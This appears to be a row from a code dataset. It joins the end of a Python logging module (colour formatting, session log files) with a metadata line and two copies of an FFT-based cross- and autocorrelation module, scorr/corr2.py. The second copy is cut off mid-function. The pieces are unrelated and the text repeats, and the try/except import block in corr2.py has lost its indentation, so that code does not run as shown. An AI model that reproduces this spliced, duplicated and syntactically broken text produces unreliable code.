    def __init__(self, info_stream=sys.stdout, err_stream=sys.stderr):
        super(MultiplexingHandler, self).__init__()
        self.info_handler = logging.StreamHandler(info_stream)
        self.err_handler = logging.StreamHandler(err_stream)
        # May be cleared via errors_to_stdout() to force everything to stdout.
        self.multiplex = True
    def emit(self, record):
        if record.levelno > logging.INFO and self.multiplex:
            target = self.err_handler
        else:
            target = self.info_handler
        target.emit(record)
        # ignore broken pipes, this often happens when cleaning up and exiting
        try:
            target.flush()
        except PipeError:
            pass
    def flush(self):
        try:
            for sub in (self.err_handler, self.info_handler):
                sub.flush()
        except PipeError:
            pass
    def close(self):
        for sub in (self.err_handler, self.info_handler):
            sub.close()
    def setFormatter(self, fmt):
        for sub in (self.err_handler, self.info_handler):
            sub.setFormatter(fmt)
class Colors():
    """ANSI escape codes, blanked out when stdin is not a terminal."""
    # Evaluated once at import time: without a tty every code collapses to
    # an empty string, so log output stays free of escape sequences.
    WARNING = '\033[93m' if sys.stdin.isatty() else ''
    ERROR = '\033[91m' if sys.stdin.isatty() else ''
    BOLD = '\033[1m' if sys.stdin.isatty() else ''
    GREEN = '\033[92m' if sys.stdin.isatty() else ''
    ENDC = '\033[0m' if sys.stdin.isatty() else ''
class ColorizingFormatter(logging.Formatter):
    """Formatter that replaces the ``{<{<``/``>}>}`` markers with ANSI codes.

    The opening marker becomes a color chosen from an explicit
    ``record.color`` attribute (looked up on ``Colors``) or from the record's
    severity; the closing marker becomes the reset code.  When no color
    applies, both markers are simply stripped.
    """
    def format(self, record):
        if hasattr(record, 'color'):
            begin = getattr(Colors, record.color, "")
        elif record.levelno >= logging.ERROR:
            begin = Colors.ERROR
        elif record.levelno >= logging.WARNING:
            begin = Colors.WARNING
        else:
            begin = ""
        end = Colors.ENDC if begin else ""
        text = super(ColorizingFormatter, self).format(record)
        return text.replace("{<{<", begin).replace(">}>}", end)
# Console formats: the {<{< ... >}>} markers delimit the span that
# ColorizingFormatter replaces with ANSI colour codes.
_default_format = "%(name)s%(timestamp)s: {<{<%(severity)s%(message)s>}>}"
_default_format_boring = "%(name)s%(timestamp)s: %(severity)s%(message)s"
_boring_formatter = logging.Formatter(_default_format_boring)
_colorful_formatter = ColorizingFormatter(_default_format)
# Single shared console handler; init() attaches it to the app logger.
_default_console_handler = MultiplexingHandler()
def init(appname, timestamps=True, boring=False):
    """Create and configure the module-wide application logger.

    Attaches a TimestampFilter and the shared console handler, sets the
    level to INFO and disables propagation to the root logger.

    Parameters
    ----------
    appname : str
        Name of the logger (and of the application).
    timestamps : bool, optional
        Annotate records with elapsed-time stamps (default True).
    boring : bool, optional
        Use the colourless formatter instead of the ANSI one (default False).
    """
    global logger
    global _default_formatter
    logging.basicConfig()
    app_logger = logging.getLogger(appname)
    TimestampFilter.enable = timestamps
    app_logger.addFilter(TimestampFilter())
    formatter = _colorful_formatter if not boring else _boring_formatter
    _default_console_handler.setFormatter(formatter)
    app_logger.addHandler(_default_console_handler)
    app_logger.setLevel(logging.INFO)
    app_logger.propagate = False
    logger = app_logger
    return logger
def errors_to_stdout(enable=True):
    """Route warning/error records to stdout instead of stderr.

    Turns off the console handler's severity-based stream multiplexing.
    """
    _default_console_handler.multiplex = not enable
def enable_timestamps(enable=True):
    """Toggle the elapsed-time annotation added by TimestampFilter."""
    TimestampFilter.enable = enable
def disable_printing():
    """Detach the shared console handler so nothing is printed to the terminal."""
    logger.removeHandler(_default_console_handler)
def enable_logfile(logtype, verbose=False):
    """Open a timestamped session log file and attach it to the logger.

    Creates ``~/.radiopadre/logs/log-<logtype>-<datetime>.txt``, registers a
    stream handler for it, schedules a flush at interpreter exit, and prunes
    all but the NUM_RECENT_LOGS most recent files of the same logtype.

    Parameters
    ----------
    logtype : str
        Tag included in the log file name (and used to match old logs).
    verbose : bool, optional
        Log what is being created/deleted (default False).

    Returns
    -------
    (file object, str)
        The open log file and its path.
    """
    from .utils import make_dir, make_radiopadre_dir, ff
    global logfile, logfile_handler
    radiopadre_dir = make_radiopadre_dir()
    make_dir(ff("{radiopadre_dir}/logs"))
    datetime = time.strftime("%Y%m%d%H%M%S")
    logname = os.path.expanduser(ff("{radiopadre_dir}/logs/log-{logtype}-{datetime}.txt"))
    logfile = open(logname, 'wt')
    logfile_handler = logging.StreamHandler(logfile)
    # File records carry a wall-clock timestamp and the colourless format.
    logfile_handler.setFormatter(logging.Formatter(
        "%(asctime)s: " + _default_format_boring,
        "%Y-%m-%d %H:%M:%S"))
    logger.addHandler(logfile_handler)
    # make sure pending records hit the disk at interpreter exit
    atexit.register(flush)
    if verbose:
        logger.info(ff("writing session log to {logname}"))
    # clear most recent log files
    recent_logs = sorted(glob.glob(ff("{radiopadre_dir}/logs/log-{logtype}-*.txt")))
    if len(recent_logs) > NUM_RECENT_LOGS:
        delete_logs = recent_logs[:-NUM_RECENT_LOGS]
        if verbose:
            logger.info("  (also deleting {} old log file(s) matching log-{}-*.txt)".format(len(delete_logs), logtype))
        for oldlog in delete_logs:
            try:
                os.unlink(oldlog)
            except Exception as exc:
                # best effort: a stale log we cannot remove is not fatal
                if verbose:
                    logger.warning(ff("    failed to delete {oldlog}: {exc}"))
    return logfile, logname
def flush():
    """Flush the session log file handler, if one has been enabled."""
    if logfile_handler:
        logfile_handler.flush()
| 3,626 | 291 | 371 |
b35665aaff7c116d6a6e30705950d837c5a5e85c | 17,041 | py | Python | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | 5 | 2020-01-22T11:38:32.000Z | 2021-05-16T18:25:51.000Z | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | null | null | null | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | 1 | 2020-01-22T11:38:34.000Z | 2020-01-22T11:38:34.000Z | """Functions to calculate two-point correlations.
"""
import numpy as np
import pandas as pd
from scipy.fftpack import fft, ifft
from scipy.linalg import toeplitz
try:
from progress import getLogger
except ImportError:
from logging import getLogger
from .helpers import is_number_like, is_string_like, get_nfft
# Helpers
# ===========================================================================
def corr_mat(x, maxlag=None):
    """Build the Toeplitz correlation matrix implied by a correlation array.

    Parameters
    ----------
    x : array-like
        Correlation array in the form returned by e.g. acorr, xcorr
        (lag 0 first, negative lags at the end — NOT centered!).
    maxlag : int, optional
        Maximum lag to include (should be < len(x) / 2).
    """
    # Target layout:
    #   | c_0   c_1  ...  c_L |
    #   | c_-1  c_0  ...      |
    #   | ...                 |
    #   | c_-L  ...       c_0 |
    if not maxlag:
        first_col = np.concatenate([[x[0]], x[:0:-1]])
        first_row = x
    else:
        # column holds lags 0, -1, ..., -maxlag; row holds 0, 1, ..., +maxlag
        first_col = np.concatenate([[x[0]], x[:-maxlag:-1]])
        first_row = x[:maxlag]
    return toeplitz(first_col, first_row)
def xcorrshift(x, maxlag=None, as_pandas=False):
    """Return shifted (cross- / auto) correlation to center lag zero.

    Parameters
    ----------
    x : array-like or pandas object
        Uncentered correlation (lag 0 first, negative lags at the end).
    maxlag : int, optional
        Largest lag to keep; defaults to len(x) // 2.
    as_pandas : bool, optional
        Force a pandas Series/DataFrame result for plain-array input.
    """
    if not maxlag:
        maxlag = len(x) // 2
    # force pandas output?
    if as_pandas and not hasattr(x, 'iloc'):
        if len(np.shape(x)) > 1:
            x = pd.DataFrame(x)
        else:
            x = pd.Series(x)
    # slice out lags -maxlag .. +maxlag
    ix = np.arange(-maxlag, maxlag+1, dtype=int)
    if hasattr(x, 'iloc'):
        xs = x.iloc[ix]
        xs.index = ix
    else:
        try:
            xs = x[ix]
        except (TypeError, IndexError, KeyError):
            # Plain sequences (e.g. lists) don't support fancy indexing;
            # fall back to numpy.  Fix: was a bare `except:`, which also
            # swallowed KeyboardInterrupt/SystemExit.
            xs = np.asanyarray(x)[ix]
    return xs
def fftcrop(x, maxlag):
    """Crop an uncentered fft/correlation array to +-maxlag (lag 0 stays first)."""
    head, tail = x[:maxlag], x[-maxlag:]
    return np.concatenate([head, tail])
def padded_xcorr_norm(nfft, pad, debias=False):
    """Return the weight vector that normalises zero-padded FFT correlations.

    Without padding every lag shares the weight ``nfft``; with padding but no
    debiasing every lag shares ``nfft - pad``; with debiasing each lag gets
    the number of genuinely overlapping samples (clipped from below).

    Parameters
    ----------
    nfft : int
        Length of the fft segment(s).
    pad : int
        Number of padded zeros.
    debias : bool, optional
        Weight each lag by its actual overlap (default False).
    """
    ndat = nfft - pad
    if pad <= 0:
        return nfft * np.ones(1)
    if not debias:
        return ndat * np.ones(1)
    nmp = max(1, ndat - pad)
    # layout mirrors the fft ordering: lag 0, 1, ... | clipped long lags | ..., -2, -1
    return np.concatenate([
        np.arange(ndat, nmp, -1),
        nmp * np.ones(max(0, nfft - 2 * (ndat - nmp) + 1)),
        np.arange(nmp + 1, ndat, 1),
    ])
# For arrays
# ===========================================================================
def xcorr(
    x, y,
    norm='corr',
    nfft='auto',
    subtract_mean=True,
    debias=False,
    e=0
    ):
    """Return cross-correlation or covariance calculated using FFT.

    Parameters
    -----------
    x, y: array-like (1-D)
        Time series to analyse.
    norm: [optional]
        How to normalise the result
        "corr": Return correlation, i.e. r \\in [-1, 1] (default).
        "cov":  Return covariance. E.g. the peak of an autocorrelation
                will have the height var(x) = var(y)
        int, float:
            Normalise result by this number.
    nfft: int, str [optional]
        How to set the length of the FFT (default: 'pad').
        'len':   Always use len(x), exact for periodic x, y.
        'pad':   Pad length to next number of two.
        'demix': Zero-pad to demix causal and anti-causal part, giving
                 the exact result for an aperiodic signal.
        'auto':  Equal to 'len' for short series and 'pad' for long series
                 for better performance. This setting is appropriate when
                 the maximum lag of interest much smaller then half the signal
                 length.
        int:     Passed through to fft.
    subtract_mean: bool [optional]
        Subtract the signals' means (default: True).
    debias: bool [optional]
        True:  Correct the bias from zero-padding if applicable.
               This corresponds to the assumption that x, y are segments
               of two stationary processes.
               The SNR will decrease with |lag| because the number of
               data points decreases.
        False: Don't correct. This corresponds to the assumption that x and y
               are zero outside of the observed range. As a consequence,
               the correlation (or covariance) converges to zero for long lags.
        Default: False because the bias is only significant compared to the
        noise level when many short segments are averaged. It is also
        consistent with similar functions like e.g. numpy.correlate.
    e: float [optional]
        Small epsilon to add to normalisation. This avoids e.g. blowing
        up correlations when the variances of x, y are extremely small.
        Default: 0.

    Notes:
    -----
    The Fourier transform relies on the assumption that x and y are periodic.
    This may create unexpected resuls for long lags in time series that are
    shorter than the correlation length. To mitigate this effect, consider
    nfft='pad'.

    The output is uncentered, use xcorrshift to center.

    The parameter combination
        nfft='pad', norm=1, subtract_mean=False, debias=False
    corresponds to numpy.correlate with mode='full'.
    """
    lx = len(x)
    assert lx == len(y), "Arrays must have the same length"
    # padding for demixing and higher performance
    crop_pad = False
    if nfft == 'auto':
        if lx >= 10**4:
            nfft = 'pad'
        else:
            nfft = 'len'
    if nfft == 'demix':
        # doubled segment fully separates causal and anti-causal lags
        nfft = int(2**(np.ceil(np.log2(len(x))) + 1))
        crop_pad = True
    elif nfft == 'pad':
        nfft = int(2**(np.ceil(np.log2(len(x)))))
        crop_pad = True
    elif nfft == 'len':
        nfft = lx
    else:
        assert nfft == int(nfft), "nfft must be either 'pad', 'len', or an int"
    #print "xcorr nfft:", nfft
    # flatten arrays to 1 dimension, extracts values from pd.Dataframe too
    x = np.ravel(x)
    y = np.ravel(y)
    # fourier transform of x
    if subtract_mean:
        # normally the mean is subtracted from the signal
        x = x-np.mean(x)
    xfft = fft(x, n=nfft)
    # fourier transform of y
    if x is y:
        # identical objects (acorr without mean subtraction): reuse the fft.
        # Note: when subtract_mean rebinds x above, this shortcut no longer
        # triggers even for acorr; the general branch below gives the
        # identical result at the cost of a second fft.
        yfft = xfft
    else:
        if subtract_mean:
            y = y-np.mean(y)
        yfft = fft(y, n=nfft)
    # inverse transform
    r = np.real(ifft(xfft * np.conjugate(yfft)))
    del xfft, yfft
    # normalisation: per-lag weights matching the zero-padding scheme
    ly = padded_xcorr_norm(nfft, nfft - len(y), debias=debias)
    if norm == "cov":
        n = ly
    elif is_number_like(norm):
        n = np.asanyarray(norm, dtype=float)
    else:
        # "corr" (and any unrecognised value): divide by the (co)variance
        n = ly
        if x is y:
            n *= np.var(x)
        else:
            n *= np.std(x) * np.std(y)
    # done
    r = r / (n + e)
    if crop_pad:
        # drop the padded middle so only lags -lx..lx-1 remain
        r = fftcrop(r, lx)
    return r
def acorr(y, **kwargs):
    """Return the autocorrelation of ``y``; shorthand for ``xcorr(y, y, **kwargs)``.

    See xcorr for documentation.
    """
    return xcorr(y, y, **kwargs)
# For pandas
# ===========================================================================
def xcorr_grouped_df(
    df,
    cols,
    by            = 'date',
    nfft          = 'pad',
    funcs         = (lambda x: x, lambda x: x),
    subtract_mean = 'total',
    norm          = 'total',
    return_df     = True,
    debias        = True,
    **kwargs
    ):
    """Group dataframe and calc cross correlation for each group separately.

    Returns: mean and std over groups.

    Parameters:
    ===========
    df: pandas.DataFrame
        input time series, must include the columns
        for which we calculate the xcorr and the one by which we group.
    cols: list of str
        colums with the time series' of interest.
    by: str [optional]
        column by which to group. default: 'date'
    nfft: int, str [optional]
        Twice the maximal lag measured. default: 'pad'
        'len': use smallest group size.
        'pad > 100': zero pad to next power of two of smallest froup size
        larger than 100. I.e. at least 128.
        ... see get_nfft for more details
    funcs: list of functions [optional]
        functions to apply to cols before calculating the xcorr.
        default: identity (lambda x: x)
    subtract_mean: str [optional]
        what to subtract from the time series before calculating the
        autocorr.
        'total': subtract mean of the whole series from each group
        'group': subtract group mean from each group
        None:    subtract nothing
        default: 'total'
    norm: str [optional]
        Normalisation. default: 'total' (normalise normalise days to cov,
        the end result by total cov giving approx. a correlation.)
        Other Values are passed to xcorr and used on each day separately.
    return_df: bool
        Return a pandas.DataFrame. Default: True.
    debias: bool [optional]
        True:  Correct the bias from zero-padding if applicable (default).
        False: Don't debias.

    **kwargs are passed through. see also: acorr, xcorr, acorr_grouped_df
    """
    # group, allocate, slice
    g = df.groupby(by)
    # we always need columns
    cols = list(cols)
    df = df[np.unique(cols)]
    g = g[cols]
    # determine fft segment size
    nfft, events_required = get_nfft(nfft, g)
    maxlag = int(min(nfft//2, events_required))
    # allocate: one column of lags per group
    acd = np.zeros((2*maxlag, len(g)))
    # what to subtract
    fdf0 = None
    fdf1 = None
    if subtract_mean in ('total', 'auto'):
        # must match normalisation code below
        fdf0 = funcs[0](df[cols[0]])
        fdf1 = funcs[1](df[cols[1]])
        subtract = [
            fdf0.mean(),
            fdf1.mean(),
        ]
        sm = False
    elif subtract_mean in ('group', 'each', True, by):
        # let xcorr remove each group's own mean
        subtract = [0,0]
        sm = True
    else:
        subtract = [0,0]
        sm = False
    # which norm for each day?
    if norm in ("total", "auto"):
        # calculate covariances for each day and later divide by global cov.
        nd = 'cov'
    else:
        nd = norm
    # do it
    discarded_days = 0
    for i, (gk, gs) in enumerate(g):
        if len(gs) < events_required:
            # this day is too short
            discarded_days += 1
            continue
        else:
            x = np.zeros(nfft)
            # average over minimally overlapping segments
            nit = int(np.ceil(len(gs) / float(nfft)))
            tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
            for j in range(nit):
                x += xcorr(
                    funcs[0](gs[cols[0]][tj[j]:tj[j]+nfft]) - subtract[0],
                    funcs[1](gs[cols[1]][tj[j]:tj[j]+nfft]) - subtract[1],
                    subtract_mean=sm,
                    norm   = nd,
                    nfft   = nfft,
                    debias = debias,
                    **kwargs
                )
            acd[:,i] = fftcrop(x / nit, maxlag)
            del x
    # average over groups
    acdm = acd.mean(axis=1)
    acde = acd.std(axis=1)
    n = 1.
    if norm in ("total", "auto"):
        if fdf0 is None:
            # maybe we didn't calculate these yet
            # must match subtract code above!
            fdf0 = funcs[0](df[cols[0]])
            fdf1 = funcs[1](df[cols[1]])
        # from cross covariance to cross correlation
        n = 1./(np.std(fdf0) * np.std(fdf1))
    if discarded_days:
        getLogger(__name__).info(
            "Discarded %i %ss < %i events" % (
                discarded_days, by, events_required
            )
        )
        # re-scale: empty columns were averaged in as zeros above
        n *= len(g) / float(len(g) - discarded_days)
    acdm *= n
    acde *= n
    # done
    if return_df:
        lag = pd.Index(list(range(-maxlag,maxlag+1)), name='lag')
        return pd.DataFrame({
            'xcorr':     xcorrshift(acdm, maxlag),
            'xcorr_std': xcorrshift(acde, maxlag),
        }, index=lag)
    else:
        return acdm, acde
def acorr_grouped_df(
    df,
    col           = None,
    by            = 'date',
    nfft          = 'pad',
    func          = lambda x: x,
    subtract_mean = 'total',
    norm          = 'total',
    return_df     = True,
    debias        = True,
    **kwargs
    ):
    """Group dataframe and calc autocorrelation for each group separately.

    Returns: mean and std over groups for positive lags only.

    Parameters:
    ===========
    df: pandas.DataFrame, pandas.Series
        input time series. If by is a string, df must include the column
        for which we calculate the autocorr and the one by which we group.
        If by is a series, df can be a series, too.
    col: str, None [optional]
        column with the time series of interest.
    by: str [optional]
        column by which to group. default: 'date'
    nfft: int, str [optional]
        twice the maximal lag measured. default: 'pad'
        'auto': use smallest group size.
        'auto pad > 100': zero pad to segments of length >= 200,
        skip days with fewer events
    func: function [optional]
        function to apply to col before calculating the autocorr.
        default: identity.
    subtract_mean: str [optional]
        what to subtract from the time series before calculating the
        autocorr.
        'total': subtract mean of the whole series from each group
        'group': subtract group mean from each group
        None:    subtract nothing
        default: 'total'
    norm: str [optional]
        default: 'total' (normalise mean response to one at lag zero).
        Other values are passed to acorr and applied to each group
        separately.
    debias: bool [optional]
        True:  Correct the bias from zero-padding if applicable (default).
        False: Don't debias.

    **kwargs are passed through. see also: acorr, xcorr, xcorr_grouped_df
    """
    # group, allocate, slice
    g = df.groupby(by)
    if not col:
        if (
                is_string_like(by)
                and hasattr(df, 'columns')
                and by in df.columns
            ):
            # we just got two columns, one is group, so it's clear what to do
            col = list(df.columns)
            col.remove(by)
        elif len(df.shape) > 1:
            # fix: raise with a message instead of a bare ValueError
            raise ValueError(
                "cannot infer the column of interest from a multi-column "
                "frame; please pass `col` explicitly")
    # determine fft segment size
    nfft, events_required = get_nfft(nfft, g)
    maxlag = int(min(nfft//2, events_required))
    # allocate: positive lags only (incl. lag 0), one column per group
    acd = np.zeros((maxlag + 1, len(g)))
    # what to subtract
    # (fix: removed unused local `fdf`, a leftover from xcorr_grouped_df)
    if subtract_mean in ('total', 'auto'):
        subtract = func(df[col]).mean()
        sm = False
    elif subtract_mean in ('group', 'each', True, by):
        # let acorr remove each group's own mean
        subtract = 0
        sm = True
    else:
        subtract = 0
        sm = False
    # which norm for each day?
    if norm in ("total", "auto"):
        # calculate covariances for each day, later norm to one giving a corr.
        nd = 'cov'
    else:
        nd = norm
    # do it
    discarded_days = 0
    for i, (gk, gs) in enumerate(g):
        if len(gs) < events_required:
            # this day is too short
            discarded_days += 1
            continue
        else:
            x = np.zeros(maxlag+1)
            # average over minimally overlapping segments
            nit = int(np.ceil(len(gs) / float(nfft)))
            tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
            for j in range(nit):
                x += acorr(
                    func(gs[col][tj[j]:tj[j]+nfft]) - subtract,
                    subtract_mean=sm,
                    norm   = nd,
                    nfft   = nfft,
                    debias = debias,
                    **kwargs
                )[:maxlag+1]
            acd[:,i] = x / nit
            del x
    # average over groups
    acdm = acd.mean(axis=1)
    acde = acd.std(axis=1)
    n = 1
    if norm in ("total", "auto"):
        # norm to one (implicitly also compensates for discarded groups)
        n = 1./acdm[0]
    elif discarded_days:
        # re-scale: empty columns were averaged in as zeros above
        n = len(g) / float(len(g) - discarded_days)
    if discarded_days:
        getLogger(__name__).info(
            "Discarded %i %ss < %i events" % (
                discarded_days, by, events_required
            )
        )
    acdm *= n
    acde *= n
    # done
    if return_df:
        lag = pd.Index(list(range(maxlag+1)), name='lag')
        return pd.DataFrame({
            'acorr':     acdm,
            'acorr_std': acde,
        }, index=lag)
    else:
        return acdm, acde
| 31.383057 | 79 | 0.529957 | """Functions to calculate two-point correlations.
"""
import numpy as np
import pandas as pd
from scipy.fftpack import fft, ifft
from scipy.linalg import toeplitz
try:
from progress import getLogger
except ImportError:
from logging import getLogger
from .helpers import is_number_like, is_string_like, get_nfft
# Helpers
# ===========================================================================
def corr_mat(x, maxlag=None):
    """Build the Toeplitz correlation matrix implied by a correlation array.

    Parameters
    ----------
    x : array-like
        Correlation array in the form returned by e.g. acorr, xcorr
        (lag 0 first, negative lags at the end — NOT centered!).
    maxlag : int, optional
        Maximum lag to include (should be < len(x) / 2).
    """
    # Target layout:
    #   | c_0   c_1  ...  c_L |
    #   | c_-1  c_0  ...      |
    #   | ...                 |
    #   | c_-L  ...       c_0 |
    if not maxlag:
        first_col = np.concatenate([[x[0]], x[:0:-1]])
        first_row = x
    else:
        # column holds lags 0, -1, ..., -maxlag; row holds 0, 1, ..., +maxlag
        first_col = np.concatenate([[x[0]], x[:-maxlag:-1]])
        first_row = x[:maxlag]
    return toeplitz(first_col, first_row)
def xcorrshift(x, maxlag=None, as_pandas=False):
    """Return shifted (cross- / auto) correlation to center lag zero.

    Parameters
    ----------
    x : array-like or pandas object
        Uncentered correlation (lag 0 first, negative lags at the end).
    maxlag : int, optional
        Largest lag to keep; defaults to len(x) // 2.
    as_pandas : bool, optional
        Force a pandas Series/DataFrame result for plain-array input.
    """
    if not maxlag:
        maxlag = len(x) // 2
    # force pandas output?
    if as_pandas and not hasattr(x, 'iloc'):
        if len(np.shape(x)) > 1:
            x = pd.DataFrame(x)
        else:
            x = pd.Series(x)
    # slice out lags -maxlag .. +maxlag
    ix = np.arange(-maxlag, maxlag+1, dtype=int)
    if hasattr(x, 'iloc'):
        xs = x.iloc[ix]
        xs.index = ix
    else:
        try:
            xs = x[ix]
        except (TypeError, IndexError, KeyError):
            # Plain sequences (e.g. lists) don't support fancy indexing;
            # fall back to numpy.  Fix: was a bare `except:`, which also
            # swallowed KeyboardInterrupt/SystemExit.
            xs = np.asanyarray(x)[ix]
    return xs
def fftcrop(x, maxlag):
    """Crop an uncentered fft/correlation array to +-maxlag (lag 0 stays first)."""
    head, tail = x[:maxlag], x[-maxlag:]
    return np.concatenate([head, tail])
def padded_xcorr_norm(nfft, pad, debias=False):
    """Return the weight vector that normalises zero-padded FFT correlations.

    Without padding every lag shares the weight ``nfft``; with padding but no
    debiasing every lag shares ``nfft - pad``; with debiasing each lag gets
    the number of genuinely overlapping samples (clipped from below).

    Parameters
    ----------
    nfft : int
        Length of the fft segment(s).
    pad : int
        Number of padded zeros.
    debias : bool, optional
        Weight each lag by its actual overlap (default False).
    """
    ndat = nfft - pad
    if pad <= 0:
        return nfft * np.ones(1)
    if not debias:
        return ndat * np.ones(1)
    nmp = max(1, ndat - pad)
    # layout mirrors the fft ordering: lag 0, 1, ... | clipped long lags | ..., -2, -1
    return np.concatenate([
        np.arange(ndat, nmp, -1),
        nmp * np.ones(max(0, nfft - 2 * (ndat - nmp) + 1)),
        np.arange(nmp + 1, ndat, 1),
    ])
# For arrays
# ===========================================================================
def xcorr(
    x, y,
    norm='corr',
    nfft='auto',
    subtract_mean=True,
    debias=False,
    e=0
    ):
    """Return cross-correlation or covariance calculated using FFT.

    Parameters
    -----------
    x, y: array-like (1-D)
        Time series to analyse.
    norm: [optional]
        How to normalise the result
        "corr": Return correlation, i.e. r \\in [-1, 1] (default).
        "cov":  Return covariance. E.g. the peak of an autocorrelation
                will have the height var(x) = var(y)
        int, float:
            Normalise result by this number.
    nfft: int, str [optional]
        How to set the length of the FFT (default: 'pad').
        'len':   Always use len(x), exact for periodic x, y.
        'pad':   Pad length to next number of two.
        'demix': Zero-pad to demix causal and anti-causal part, giving
                 the exact result for an aperiodic signal.
        'auto':  Equal to 'len' for short series and 'pad' for long series
                 for better performance. This setting is appropriate when
                 the maximum lag of interest much smaller then half the signal
                 length.
        int:     Passed through to fft.
    subtract_mean: bool [optional]
        Subtract the signals' means (default: True).
    debias: bool [optional]
        True:  Correct the bias from zero-padding if applicable.
               This corresponds to the assumption that x, y are segments
               of two stationary processes.
               The SNR will decrease with |lag| because the number of
               data points decreases.
        False: Don't correct. This corresponds to the assumption that x and y
               are zero outside of the observed range. As a consequence,
               the correlation (or covariance) converges to zero for long lags.
        Default: False because the bias is only significant compared to the
        noise level when many short segments are averaged. It is also
        consistent with similar functions like e.g. numpy.correlate.
    e: float [optional]
        Small epsilon to add to normalisation. This avoids e.g. blowing
        up correlations when the variances of x, y are extremely small.
        Default: 0.

    Notes:
    -----
    The Fourier transform relies on the assumption that x and y are periodic.
    This may create unexpected resuls for long lags in time series that are
    shorter than the correlation length. To mitigate this effect, consider
    nfft='pad'.

    The output is uncentered, use xcorrshift to center.

    The parameter combination
        nfft='pad', norm=1, subtract_mean=False, debias=False
    corresponds to numpy.correlate with mode='full'.
    """
    lx = len(x)
    assert lx == len(y), "Arrays must have the same length"
    # padding for demixing and higher performance
    crop_pad = False
    if nfft == 'auto':
        if lx >= 10**4:
            nfft = 'pad'
        else:
            nfft = 'len'
    if nfft == 'demix':
        # doubled segment fully separates causal and anti-causal lags
        nfft = int(2**(np.ceil(np.log2(len(x))) + 1))
        crop_pad = True
    elif nfft == 'pad':
        nfft = int(2**(np.ceil(np.log2(len(x)))))
        crop_pad = True
    elif nfft == 'len':
        nfft = lx
    else:
        assert nfft == int(nfft), "nfft must be either 'pad', 'len', or an int"
    #print "xcorr nfft:", nfft
    # flatten arrays to 1 dimension, extracts values from pd.Dataframe too
    x = np.ravel(x)
    y = np.ravel(y)
    # fourier transform of x
    if subtract_mean:
        # normally the mean is subtracted from the signal
        x = x-np.mean(x)
    xfft = fft(x, n=nfft)
    # fourier transform of y
    if x is y:
        # identical objects (acorr without mean subtraction): reuse the fft.
        # Note: when subtract_mean rebinds x above, this shortcut no longer
        # triggers even for acorr; the general branch below gives the
        # identical result at the cost of a second fft.
        yfft = xfft
    else:
        if subtract_mean:
            y = y-np.mean(y)
        yfft = fft(y, n=nfft)
    # inverse transform
    r = np.real(ifft(xfft * np.conjugate(yfft)))
    del xfft, yfft
    # normalisation: per-lag weights matching the zero-padding scheme
    ly = padded_xcorr_norm(nfft, nfft - len(y), debias=debias)
    if norm == "cov":
        n = ly
    elif is_number_like(norm):
        n = np.asanyarray(norm, dtype=float)
    else:
        # "corr" (and any unrecognised value): divide by the (co)variance
        n = ly
        if x is y:
            n *= np.var(x)
        else:
            n *= np.std(x) * np.std(y)
    # done
    r = r / (n + e)
    if crop_pad:
        # drop the padded middle so only lags -lx..lx-1 remain
        r = fftcrop(r, lx)
    return r
def acorr(y, **kwargs):
    """Return the autocorrelation of ``y``; shorthand for ``xcorr(y, y, **kwargs)``.

    See xcorr for documentation.
    """
    return xcorr(y, y, **kwargs)
# For pandas
# ===========================================================================
def xcorr_grouped_df(
    df,
    cols,
    by            = 'date',
    nfft          = 'pad',
    funcs         = (lambda x: x, lambda x: x),
    subtract_mean = 'total',
    norm          = 'total',
    return_df     = True,
    debias        = True,
    **kwargs
    ):
    """Group dataframe and calc cross correlation for each group separately.

    Returns: mean and std over groups.

    Parameters:
    ===========
    df: pandas.DataFrame
        input time series, must include the columns
        for which we calculate the xcorr and the one by which we group.
    cols: list of str
        colums with the time series' of interest.
    by: str [optional]
        column by which to group. default: 'date'
    nfft: int, str [optional]
        Twice the maximal lag measured. default: 'pad'
        'len': use smallest group size.
        'pad > 100': zero pad to next power of two of smallest froup size
        larger than 100. I.e. at least 128.
        ... see get_nfft for more details
    funcs: list of functions [optional]
        functions to apply to cols before calculating the xcorr.
        default: identity (lambda x: x)
    subtract_mean: str [optional]
        what to subtract from the time series before calculating the
        autocorr.
        'total': subtract mean of the whole series from each group
        'group': subtract group mean from each group
        None:    subtract nothing
        default: 'total'
    norm: str [optional]
        Normalisation. default: 'total' (normalise normalise days to cov,
        the end result by total cov giving approx. a correlation.)
        Other Values are passed to xcorr and used on each day separately.
    return_df: bool
        Return a pandas.DataFrame. Default: True.
    debias: bool [optional]
        True:  Correct the bias from zero-padding if applicable (default).
        False: Don't debias.

    **kwargs are passed through. see also: acorr, xcorr, acorr_grouped_df
    """
    # group, allocate, slice
    g = df.groupby(by)
    # we always need columns
    cols = list(cols)
    df = df[np.unique(cols)]
    g = g[cols]
    # determine fft segment size
    nfft, events_required = get_nfft(nfft, g)
    maxlag = int(min(nfft//2, events_required))
    # allocate: one column of lags per group
    acd = np.zeros((2*maxlag, len(g)))
    # what to subtract
    fdf0 = None
    fdf1 = None
    if subtract_mean in ('total', 'auto'):
        # must match normalisation code below
        fdf0 = funcs[0](df[cols[0]])
        fdf1 = funcs[1](df[cols[1]])
        subtract = [
            fdf0.mean(),
            fdf1.mean(),
        ]
        sm = False
    elif subtract_mean in ('group', 'each', True, by):
        # let xcorr remove each group's own mean
        subtract = [0,0]
        sm = True
    else:
        subtract = [0,0]
        sm = False
    # which norm for each day?
    if norm in ("total", "auto"):
        # calculate covariances for each day and later divide by global cov.
        nd = 'cov'
    else:
        nd = norm
    # do it
    discarded_days = 0
    for i, (gk, gs) in enumerate(g):
        if len(gs) < events_required:
            # this day is too short
            discarded_days += 1
            continue
        else:
            x = np.zeros(nfft)
            # average over minimally overlapping segments
            nit = int(np.ceil(len(gs) / float(nfft)))
            tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
            for j in range(nit):
                x += xcorr(
                    funcs[0](gs[cols[0]][tj[j]:tj[j]+nfft]) - subtract[0],
                    funcs[1](gs[cols[1]][tj[j]:tj[j]+nfft]) - subtract[1],
                    subtract_mean=sm,
                    norm   = nd,
                    nfft   = nfft,
                    debias = debias,
                    **kwargs
                )
            acd[:,i] = fftcrop(x / nit, maxlag)
            del x
    # average over groups
    acdm = acd.mean(axis=1)
